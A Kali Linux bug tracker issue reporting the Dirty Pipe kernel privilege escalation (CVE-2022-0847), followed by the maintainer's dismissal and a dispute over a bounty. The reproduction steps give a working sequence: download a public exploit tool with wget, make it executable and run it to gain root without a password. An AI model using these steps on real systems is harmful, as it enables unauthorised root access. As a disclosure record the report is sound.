View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0007616 | Kali Linux | [All Projects] General Bug | public | 2022-03-11 19:45 | 2022-03-12 09:10 |
Reporter | himanshu725 | Assigned To | daniruiz | ||
Priority | urgent | Severity | major | Reproducibility | always |
Status | resolved | Resolution | fixed | ||
Product Version | 2022.1 | ||||
Target Version | Fixed in Version | 2022.2 | |||
Summary | 0007616: Kali Linux all Versions is Vulnerable to CVE 2022-0847 | Direct Privilege Escalation | ||||
Description | CVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellerman present in Linux Kernel itself post versions 5.8 which allows overwriting data in arbitrary read-only files or in simpler words, lets unprivileged processes inject code in privileged/root process and thus, escalating privilege. The original post with intricate work and details can be found here https://dirtypipe.cm4all.com/ | ||||
Steps To Reproduce | 1. Login through any Normal User that don't have super user type functionality 2. Download an Exploit from github with the help of wget utiity wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64 3. Give the all permission to downloaded file chmod 777 traitor-amd64 4. Finally execute it by ./traitor-amd64 it gives you a this type of output [+] Assessing machine state... [+] Checking for opportunities... [+][kernel:CVE-2022-0847] Kernel version 5.15.0 is vulnerable! 5. Now, at last you need to exploit this Vulnerability ./traitor-amd64 --exploit kernel:CVE-2022-0847 6. BOOM!!!! you got successfully logged from ROOT User, without root password. do anything from root user. | ||||
Additional Information | ##Background of Vulnerability Max came to know of the vulnerability after he tried to resolve unprecedented CRC errors in access logs. Many consumers of cm4all.com were reporting that monthly access logs, even though downloadable, couldn’t be decompressed and were throwing errors. Max explains in his post how he has used the Z_SYNC_FLUSH mechanism along with splicing to concatenate daily log files into monthly ZIP archives available to be downloaded over HTTP. Upon closer examination, he reached the root problem. ##Mitigations The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102. ##Reference https://dirtypipe.cm4all.com/ | ||||
|
|
|
This is already fixed in the latest kernel version |
|
Thanku for your response But, I reported now. i reported first this issue of kali Linux versions. Latest versions takes times. that means, you need to at least monetary reward or hall of fame, as like anything that appreciates security researcher to report vulnerabilities in Future. Thanks, Himanshu Sharma |
|
Thanku for your response But, I reported now. i reported first this issue of kali Linux versions. Latest versions takes times. that means, you need to at least monetary reward or hall of fame, as like anything that appreciates security researcher to report vulnerabilities in Future. Thanks, Himanshu Sharma |
|
You reported a known issue that was already patched days ago and you expect a monetary reward? For using an automated script that you found online? You have to be kidding. |
Date Modified | Username | Field | Change |
---|---|---|---|
2022-03-11 19:45 | himanshu725 | New Issue | |
2022-03-11 19:45 | himanshu725 | File Added: POC_1.png | |
2022-03-11 19:45 | himanshu725 | File Added: POC_2.png | |
2022-03-11 19:45 | himanshu725 | File Added: POC_3.png | |
2022-03-11 19:50 | daniruiz | Note Added: 0015868 | |
2022-03-11 19:50 | daniruiz | Assigned To | => daniruiz |
2022-03-11 19:50 | daniruiz | Status | new => resolved |
2022-03-11 19:50 | daniruiz | Resolution | open => fixed |
2022-03-11 19:50 | daniruiz | Fixed in Version | => 2022.2 |
2022-03-11 20:18 | himanshu725 | Status | resolved => feedback |
2022-03-11 20:18 | himanshu725 | Resolution | fixed => reopened |
2022-03-11 20:18 | himanshu725 | Note Added: 0015869 | |
2022-03-11 20:19 | himanshu725 | Note Added: 0015870 | |
2022-03-11 20:19 | himanshu725 | Status | feedback => assigned |
2022-03-11 20:23 | daniruiz | Note Added: 0015871 | |
2022-03-11 20:23 | daniruiz | Status | assigned => resolved |
2022-03-11 20:23 | daniruiz | Resolution | reopened => fixed |
2022-03-11 20:29 | himanshu725 | Status | resolved => feedback |
2022-03-11 20:29 | himanshu725 | Resolution | fixed => reopened |
2022-03-11 20:37 | daniruiz | Status | feedback => resolved |
2022-03-11 20:43 | himanshu725 | Status | resolved => feedback |
2022-03-12 09:10 | daniruiz | Status | feedback => resolved |
2022-03-12 09:10 | daniruiz | Resolution | reopened => fixed |